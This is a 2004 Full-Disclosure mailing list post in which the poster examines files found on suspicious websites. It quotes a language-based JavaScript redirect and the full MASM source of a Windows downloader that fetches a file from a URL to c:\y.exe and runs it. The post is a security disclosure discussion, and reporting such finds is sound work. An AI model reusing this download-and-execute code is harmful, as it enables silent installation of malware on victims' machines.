On 24-mei-04, at 14:46, Feher Tamas wrote:
http://www.b00gle.com/fa/?d=get
good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/ %3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/ tool.html+&hl=en
http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop
i especially liked 2 files in the dir; counter.htm containing the extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>
but then i saw this: http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope im not Violating someones copyright by posting this here,....
.386
.model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib include \masm32\include\user32.inc includelib \masm32\lib\user32.lib
.data
szLibrary db "urlmon.dll",0
szFunction db "URLDownloadToFileA",0szFileName db "c:\y.exe", 0
.code start:
invoke GetCommandLineA
add ax, 0Ah
lea ecx, [eax]
push ecx invoke LoadLibrary, addr szLibrary
invoke GetProcAddress, eax, addr szFunction pop ecx
push 0
push 0
lea ebx, [szFileName]
push ebx
push ecx
push 0
call eax invoke WinExec, addr szFileName, 1
invoke ExitProcess, NULLend start
Yet i do feel a bit suspicious about this set of files;,... bit TOO educating i think ;)
cheers!
thijs --
If i had 6 hours to chop down a tree, I'd spend the first four sharpening the axe.
-- Abraham Lincoln
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
